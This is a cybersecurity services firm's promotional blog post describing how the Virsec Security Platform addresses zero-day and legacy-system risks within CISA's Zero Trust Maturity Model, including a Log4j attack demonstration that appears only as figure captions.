Protecting Government Apps and Workloads from Zero-Day Cyber Threats

Protecting Government Apps and Workloads from Zero-Day Cyber Threats

Date: October 24, 2023
  • Home
  • >
  • We're on point
  • >
  • Protecting Government Apps and Workloads from Zero-Day Cyber Threats

In April 2023, CISA released Zero Trust Maturity Model Version 2, which added a fourth security maturity level and reaffirmed application and workload cyber requirements.

In this article we consider Application Threat Protections security levels within the Applications and Workloads pillar, and the additional mitigation required for residual risk. We will also supply a solution to address those residual risks.

Here are the new maturity levels for Threat Protections within the Applications and Workloads Pillar.

Table 1: Application and Workload: Threat Protections

Maturity FactorTraditionalInitialAdvancedOptimal
App Workflow

Integration

Minimal IntegrationBasic Integration

(mission critical apps)

Complete integration

(all apps)

Dynamic Integration

(all apps)

Threat scope
  • Known
  • Known
  • Some app- specific
  • Known
  • Some app- specific
  • Targeted
  • Real-time visibility
  • Content-aware protections against sophisticated, app-specific attacks
Residual Risks1) Legacy – Unsupported Hardware, Software, OS’s

2) Zero Day Attacks

In moving through the maturity levels (left to right in the Application and Workload: Threat Protections table above) your agency will reduce its risk with an ever-shrinking risk residual to your applications and workloads.

However, there are still two residual risk scenarios, regardless of the level of maturity the agency reaches: Legacy systems and Zero-Day attacks.

Legacy Systems

Legacy systems–in this article’s context–refer to systems that cannot move through the maturity model due to lack of support. Legacy systems examples include Windows 2003, Windows 2008 R2, and Microsoft Exchange 2013.

Traditional endpoint security (EDR/MDR/XDRs) relies on post-incident detect and respond, are challenged to stop zero-day persistent threats. These attacks often pin-down agencies with tough decisions/responses, such as turning off compromised services during an attack to block the active threat.

Agencies may have these legacy systems deployed. Over time, bad actors find and exploit the legacy systems based on no supported mitigations from the product or security vendors. Adversaries also create new risk by finding new vulnerabilities in legacy systems.

Legacy systems’ endpoint risks can often be mitigated with technical compensating controls such as inline Intrusion Protection Systems (IPS) placed in front of the legacy systems. IPS is highly effective against vulnerabilities with known signatures and scales across multiple endpoints, but IPS relies on signature-based identification—leaving the host susceptible to Zero-Day attacks.

Zero-Day Attacks

Zero-Day attacks are vulnerabilities that are currently unknown and thus do not have a pattern (signature) to match the tactics and techniques exploited by bad actors.

Enter Virsec

Virsec, a T-Rex partner, stands in the gap between Zero Trust functions and Zero-Day attacks. By protecting apps and workloads from unknown attacks, as shown below, Virsec completes the Zero-Day architecture.

Figure 1: Enter Virsec: Zero Trust Security Posture

Virsec Security Platform (VSP)

The Virsec Security Platform supports Zero Trust 2.0 Application and Workload protection. The support comes in the form of a complementary Zero Trust approach as shown in the VSP Protection Engines shown below:

Figure 2: Virsec Security Platform (VSP)

Host Protection

The security engineer manages the host protection capabilities through two tabs in the VSP web interface: host protection and application control policies (ACP) as shown here:

Figure 3: Virsec Menu

The Host Protection table (shown below) allows the security engineer to curate and refine the Allowlist, as well as apply application control policies. VSP also supports three states for each endpoint: Disabled, Protect, and Detect (Detect highlighted in blue) allowing granular control for change control and acceptance during Zero Trust projects.

Figure 4: Compliant Caption : Host Protection Table

App Control Policies

In addition to the host protections shown in the Host Protection Table (above), the host protections also support OS based application-level protections. The following screenshot shows one Linux and two Windows App Control Policies (ACPs). The security engineer may apply ACPs at the same time as Host Protections or later to limit the amount of change during deployments.

The following screenshot gives an example of one Linux and two Windows ACPs:

Figure 5: Linux and Windows ACP

For a complete list of supported Operating Systems, please refer to VSP2.8_CompatibilityGuide.pdf (virsec.com)

VSP ships with a variety of ACPs, but to get a feeling for its functionality, one of the default Application Control Policy (ACP) templates out-of-the-box is for Linux Systems with a strict match for protection of the native Linux route command is shown here:

Figure 6: Default ACP

Call Out: Commands such as route, arp, ping, ifconfig have valid use by cyber and system staff, but they are also ideal tools for hackers to use as discovery when seeking targets.

Additional VSP Application Protections

VSP’s Application Protection supplies added Zero Trust Application Protection (ZTAP) by automatically instrumenting the application workflow for multi-layer in-line monitoring through the application stack. For example, the TomCat/Java stack has multiple sectors and surfaces for attack. VSP enables protection across those sectors and here is an example protection stack screenshot from the VSP console.

Figure 7: Additional VSP Protections (Vulnerability Protection)

Additional VSP Application Protections

This section covers VSP in action for a Zero-Day attack. The example scenario is using Kali Linux and a Log4J attack against a Windows 2012 host. This example covers both scenarios of Zero-Day attack and Legacy as the host does not have a supported malware/end point protection stack available. (This is a chicken and egg issue to simulate a Zero-Day attack realistically with no hosts protections created since Log4j has been mitigated.)

The following diagram shows how VSP stops Log4J, at multiple stages of the attack.

Figure 8: Virsec Security Platform (VSP) – Applied Security Compensating Controls to Log4j

Here is the Host Protection policy for the victim (attacked) host:

Figure 9: Host Protection policy for the attacked host

For Application and Workload protections, VSP protects at the host level and the web application level.

The incident log for VSP protecting the victim is shown here:

Figure 10: Incident Log for VSP

The hacker would then experience the following output from the Log4j attack attempt.

Figure 11: Hacker Output Screen

Summary

The CISA Zero Trust 2.0 Maturity Model increases granularity in the model; however, addressing the inherent issues of Zero-Day exploits and legacy issues with unpatched vulnerabilities require added solutions and innovation. The Virsec Security Platform (VSP) is a strong solution to fill the gap for Zero-Day attacks and close the widening gap on securing legacy systems through its built-in capabilities: stopping Zero-Day attacks, ensuring zero dwell time, and continuous run-time protection.

T-Rex’s cybersecurity engineers and architects work with Federal agencies to speed their Zero Trust endeavors through T-Rex’s Zero Trust Accelerator and innovative tooling as shown here. Contact us at cybersecurity@trexsolutionsllc.com to discuss how we can assist in your Zero Trust program.


recently posted
More than Modernization: Digital Transformation Empowered by Agile Learning Culture

More than Modernization: Digital Transformation Empowered by Agile Learning Culture

Today’s avalanche of technology-driven change has made digital transformation imperative for Federal and civilian enterprises. At the heart of this transformation lies Agile Development, a methodology offering dynamic software development and delivery, which has emerged as the gold-standard for tech […]

Zero Trust Lift: Network Visibility and Analytics Maturity using Zeek

Zero Trust Lift: Network Visibility and Analytics Maturity using Zeek

Zeek is a proven open-source network visibility and analytics tool that you can leverage to increase your agency’s Network Visibility and Analytics Capability maturity under CISA’s Zero Trust Maturity Model Version 2. Zeek (https://zeek.org, formerly named Bro) is a network […]

T-Rex is Hiring at Hill Air Force Base

T-Rex is Hiring at Hill Air Force Base

Since 2016, T-Rex has been supporting large scale hybrid-cloud migrations and systems modernization, to include the successful deployment of the first-ever online U.S. Census in 2020. We are excited about expanding our IT Modernization services within the National Security market, […]

Secure by Design and Zero Trust: Integrating Supply Chain Risk Management with DevSecOps

Secure by Design and Zero Trust: Integrating Supply Chain Risk Management with DevSecOps

Agencies are seeking innovative ways to mature their Zero Trust posture. In this article, we have focused on improvements to your DevSecOps to increase maturity in two pillars: 1) Devices and Applications and 2) Workloads.